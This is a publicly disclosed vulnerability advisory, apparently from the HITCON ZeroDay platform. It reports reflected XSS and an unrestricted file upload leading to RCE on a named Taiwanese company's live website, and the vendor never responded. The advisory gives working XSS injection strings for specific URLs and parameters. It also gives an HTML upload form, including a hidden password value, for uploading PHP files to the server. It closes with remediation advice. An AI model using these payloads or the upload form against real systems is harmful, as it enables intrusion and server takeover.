清河國際股份有限公司網站存在 XSS + Arbitrary File Upload to RCE

Vulnerability Overview

ZDID: ZD-2026-00128
發信 Vendor: 清河國際股份有限公司
Title: 清河國際股份有限公司網站存在 XSS + Arbitrary File Upload to RCE
Introduction: 網站存在 XSS + Arbitrary File Upload to RCE

處理狀態

目前狀態

公開

Last Update : 2026/04/11

新提交
已審核
已通報
未回報修補狀況
未複測
公開

處理歷程

2026/01/26 13:11:17 : 新提交 (由 BTtea 更新此狀態)
2026/01/26 13:15:04 : 新提交 (由 BTtea 更新此狀態)
2026/01/26 13:16:32 : 新提交 (由 BTtea 更新此狀態)
2026/01/26 13:17:45 : 新提交 (由 BTtea 更新此狀態)
2026/01/26 13:19:45 : 新提交 (由 BTtea 更新此狀態)
2026/01/26 13:22:10 : 新提交 (由 BTtea 更新此狀態)
2026/01/26 13:24:02 : 新提交 (由 BTtea 更新此狀態)
2026/01/26 13:25:21 : 新提交 (由 BTtea 更新此狀態)
2026/01/26 13:35:20 : 新提交 (由 BTtea 更新此狀態)
2026/01/26 17:59:31 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2026/01/29 16:22:47 : 通報未回應 (由 HITCON ZeroDay 服務團隊更新此狀態)
2026/01/29 16:22:47 : 通報未回應 (由 HITCON ZeroDay 服務團隊更新此狀態)
2026/04/11 03:00:15 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

ZDID：ZD-2026-00128
通報者：blacktea_player (BTtea)
風險：嚴重
類型：任意檔案上傳 (Arbitrary File Upload)

參考資料

攻擊者可上傳任意檔案至該主機，有機會經由上傳之文件取得該主機系統權限。

漏洞說明： OWASP - Unrestricted File Upload
https://www.owasp.org/index.php/Unrestricted_File_Upload

漏洞說明： CWE-434: Unrestricted Upload of File with Dangerous Type
https://cwe.mitre.org/data/definitions/434.html

(本欄位資訊由系統根據漏洞類別自動產生，做為漏洞參考資料。)

敘述

XSS

https://www.healthstream.com.tw/index.php?act=products&pid=24&p=1

GET 參數 p 存在 XSS
xss payload

https://www.healthstream.com.tw/index.php?act=products&pid=24&p=1</title><script>alert(1)</script>

運行結果

https://www.healthstream.com.tw/fckeditorms/_samples/default.html

xss payload

<img src=1 onerror=alert(1)>

運行結果

https://www.healthstream.com.tw/header.php?act=

GET 參數 act 存在 XSS
xss payload

https://www.healthstream.com.tw/header.php?act="><script>alert(1)</script>

運行結果

https://www.healthstream.com.tw/ser_list.php

POST 參數 buyer 存在 XSS
xss payload

https://www.healthstream.com.tw/ser_list.php
POST : buyer="><script>alert(4)</script>

運行結果

https://www.healthstream.com.tw/lib/EQtest3.php

POST 參數 leave_time 存在 XSS
xss payload

https://www.healthstream.com.tw/lib/EQtest3.php
POST : leave_time=alert(5);

運行結果

https://www.healthstream.com.tw/index.php?act=lib/outpro
https://www.healthstream.com.tw/index.php?act=lib/outpro_

POST 參數 buyer , start_date , end_date , orderId , week_from , week_to 存在 XSS
xss payload

https://www.healthstream.com.tw/index.php?act=lib/outpro
https://www.healthstream.com.tw/index.php?act=lib/outpro_
POST : buyer="><script>alert(1)</script>&start_date="><script>alert(2)</script>&end_date="><script>alert(3)</script>&orderType%5B%5D=1&prout=已出貨&orderId="><script>alert(4)</script>&week_from="><script>alert(5)</script>&week_to="><script>alert(6)</script>&search=開始查詢

運行結果

Arbitrary File Upload to RCE

https://www.healthstream.com.tw/deconfig.php

並未限制或過濾上傳檔案類型導致可上傳php文件
payload

<form method="post" action="https://www.healthstream.com.tw/deconfig.php" enctype="multipart/form-data">
<input type="hidden" name="pswd" value="12345">
<input type="hidden" name="pathdir" value="ok">
<input type="file" name="file">
<input type="submit" name="submit" value="upload">
</form>

運行結果

弱點名稱	CVSS 3.1 (score & vector)	CWE 分類
XSS	5.4 (中) CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N	CWE-79
Arbitrary File Upload to RCE	9.9 (嚴重) CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H	CWE-434

修補建議

XSS 請參考
* https://zh.wikipedia.org/zh-tw/跨網站指令碼

Arbitrary File Upload
* 重命名，如 UUID (ex: 550e8400-e29b-41d4-a716-446655440000.jpg)
* 設置白名單僅允許上傳的附檔名 (ex: allow => .jpg .png)
* 上傳的目錄資料夾權限皆用純文字解釋不執行 (ex: xxx.php => content-type: text/plain)
* 上傳的目錄資料夾限制檔案存取(ex: .php .asp => 403)